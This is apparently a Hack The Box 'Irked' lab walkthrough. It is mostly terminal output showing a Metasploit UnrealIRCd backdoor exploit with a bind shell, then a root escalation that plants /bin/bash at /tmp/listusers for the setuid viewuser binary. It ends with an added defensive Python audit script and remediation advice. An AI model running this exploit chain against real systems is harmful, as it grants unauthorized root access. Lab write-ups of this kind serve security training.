Machine IP - 10.10.10.117
Starting with an nmap scan, we get the following result -
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 18:16 +04
Nmap scan report for 10.10.10.117
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
60500/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.48 seconds
We can check the IRC service. Running nmap's service enumeration against it (shown below) identifies the daemon as UnrealIRCd. This can then be searched for exploits in Metasploit as follows -
root@kali:~/Desktop/Hack The Box/irked# nmap -sV -p 6697 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 22:31 +04
Nmap scan report for 10.10.10.117
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
6697/tcp open irc UnrealIRCd
Service Info: Host: irked.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds
From here, we can use metasploit for the exploit as follows -
root@kali:~/Desktop/Hack The Box/irked# msfconsole -q
msf5 > search unreal ircd
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
exploit/linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux)
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
exploit/windows/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Win32)
###### trying the excellent one
msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal No Unix Command, Generic Command Execution
cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Started bind TCP handler against 10.10.10.117:4444
[*] Command shell session 1 opened (10.10.12.66:41567 -> 10.10.10.117:4444) at 2019-03-17 22:03:24 +0400
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
python -c 'import pty; pty.spawn("/bin/bash");'
ircd@irked:~/Unreal3.2$ whoami
whoami
ircd
This gives us a command shell on the box (via the bind TCP payload) from the vulnerable IRC daemon. Now, for privilege escalation, we can search for the setuid binaries available to the ircd user. sudo -l seems like a good starting point, but unfortunately returns nothing; in fact sudo isn't even present on the box. So, the find command can be used instead as follows -
ircd@irked:~/Unreal3.2$ sudo -l
sudo -l
bash: sudo: command not found
ircd@irked:~/Unreal3.2$ find / -perm 4755 2>/dev/null
find / -perm 4755 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
The viewuser command is the odd one out, i.e., all the others are binaries that are generally present on a Unix system. Therefore, we try running the command -
ircd@irked:~/Unreal3.2$ viewuser
viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-03-25 01:42 (:0)
sh: 1: /tmp/listusers: not found
The last line above is the shell (sh) reporting that it cannot find a binary /tmp/listusers to execute, so viewuser must be invoking that path through a shell. Since viewuser is setuid root, if it ends up executing /bin/bash it can give us a root shell. Therefore, we can try to create a file at that location, which is definitely within permissible bounds as /tmp is writeable by all users.
ircd@irked:~/Unreal3.2$ echo "/bin/bash" > /tmp/listusers
echo "/bin/bash" > /tmp/listusers
ircd@irked:~/Unreal3.2$ chmod 777 /tmp/listusers
chmod 777 /tmp/listusers
ircd@irked:~/Unreal3.2$ viewuser
viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-03-25 01:42 (:0)
root@irked:~/Unreal3.2# cd ..
cd ..
root@irked:~# ls
ls
Unreal3.2
root@irked:~# cd ..
cd ..
root@irked:/home# ls
ls
djmardov ircd
root@irked:/home# cd djmardov
cd djmardov
root@irked:/home/djmardov# ls
ls
Desktop Documents Downloads Music Pictures Public Templates Videos
root@irked:/home/djmardov# cd Desktop
cd Desktop
root@irked:/home/djmardov/Desktop# ls
ls
root@irked:/home/djmardov/Desktop# cd ../..
cd ../..
root@irked:/home# cd /root
cd /root
root@irked:/root# cat root.txt
cat root.txt
8d8e9e8be64654b6dccc3bff4522daf3
root@irked:/root# cd /
cd /
root@irked:/# find / -name user.txt 2>/dev/null
find / -name user.txt 2>/dev/null
/home/djmardov/Documents/user.txt
root@irked:/# cat /home/djmardov/Documents/user.txt
cat /home/djmardov/Documents/user.txt
4a66a78b12dc0e661a59d3f5c0267a8e
Thus, we get root and can read both the flags.
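Two steps of the walkthrough above, picking the "odd one out" from the setuid list and noticing that viewuser calls a fixed path under /tmp, can be turned into a repeatable audit that a defender would run over a host before an attacker does. The script below is an added example and is not part of the original writeup or of the Irked box. The baseline set is constructed from the stock entries in the find output above (a site would generate it from its own golden image), and SAMPLE_VIEWUSER is a constructed stand-in for the binary, not the real file.

```python
"""Setuid triage: flag setuid binaries outside a known baseline, then scan the
flagged ones for hard-coded paths that live in world-writable directories
(the /tmp/listusers pattern). Added example; baseline and sample binary are
constructed here, not taken from the target."""
import re
import subprocess
from typing import Dict, Iterable, List

# Baseline of setuid binaries expected on this kind of host. Constructed from
# the stock entries in the find output above (assumption: a real deployment
# would build it from its golden image, e.g. keeping only dpkg-owned files).
BASELINE_SUID = {
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper",
    "/usr/sbin/exim4",
    "/usr/bin/chsh",
    "/usr/bin/gpasswd",
    "/usr/bin/newgrp",
    "/usr/bin/pkexec",
    "/usr/bin/passwd",
    "/usr/bin/chfn",
    "/sbin/mount.nfs",
    "/bin/su",
    "/bin/mount",
    "/bin/fusermount",
    "/bin/ntfs-3g",
    "/bin/umount",
}

# Sample input: the find output from the walkthrough, embedded so this runs offline.
SUID_FIND_OUTPUT = """
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
"""

# Constructed stand-in for the viewuser binary: an ELF-looking header followed
# by the strings such a program would carry. Not the real file.
SAMPLE_VIEWUSER = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"This application is being devleoped to set and test user permissions\x00"
    + b"It is still being actively developed\x00"
    + b"/tmp/listusers\x00/bin/sh\x00-c\x00"
)

# Directories any local user can create files in on a default install.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Absolute path literals as they appear in a binary's string table.
PATH_RE = re.compile(rb"/(?:[A-Za-z0-9._+-]+/)*[A-Za-z0-9._+-]+")


def unexpected_suid(find_output: str, baseline: Iterable[str] = BASELINE_SUID) -> List[str]:
    """Return setuid paths from `find` output that are not in the baseline
    (the 'odd one out' step of the writeup, made repeatable)."""
    known = set(baseline)
    return [line.strip() for line in find_output.splitlines()
            if line.strip() and line.strip() not in known]


def writable_path_refs(image: bytes) -> List[str]:
    """Return absolute paths embedded in a binary image that point into a
    world-writable directory. A setuid program that executes or reads such a
    path can be hijacked by whoever creates that file first."""
    hits: List[str] = []
    for match in PATH_RE.finditer(image):
        path = match.group(0).decode("ascii", "replace")
        if path.startswith(WORLD_WRITABLE_DIRS) and path not in hits:
            hits.append(path)
    return hits


def audit(find_output: str, images: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Map each unexpected setuid binary to the writable paths it references.
    `images` holds binary contents keyed by path (read from disk on a real host)."""
    return {path: writable_path_refs(images.get(path, b""))
            for path in unexpected_suid(find_output)}


def audit_host() -> Dict[str, List[str]]:
    """Live variant: enumerate setuid files with -perm -4000, which catches every
    setuid mode (the exact-mode -perm 4755 used above misses e.g. 4711), then
    scan each unexpected one. Needs read access to the binaries."""
    proc = subprocess.run(["find", "/", "-type", "f", "-perm", "-4000"],
                          capture_output=True, text=True, check=False)
    images: Dict[str, bytes] = {}
    for path in unexpected_suid(proc.stdout):
        try:
            with open(path, "rb") as fh:
                images[path] = fh.read()
        except OSError:
            images[path] = b""
    return audit(proc.stdout, images)


if __name__ == "__main__":
    results = audit(SUID_FIND_OUTPUT, {"/usr/bin/viewuser": SAMPLE_VIEWUSER})
    for binary, refs in results.items():
        print(f"{binary}: unexpected setuid binary; writable-path references: {refs or 'none'}")
```

On the sample data this reports /usr/bin/viewuser as the only non-baseline setuid binary and /tmp/listusers as the path it would hand to a shell, which is exactly what the transcript above exploited. The fix on the host side is the mirror image of the attack: a setuid program should never execute or read a path under a world-writable directory, should drop privileges before invoking anything through a shell, and custom setuid binaries like viewuser should not be present on a production box at all.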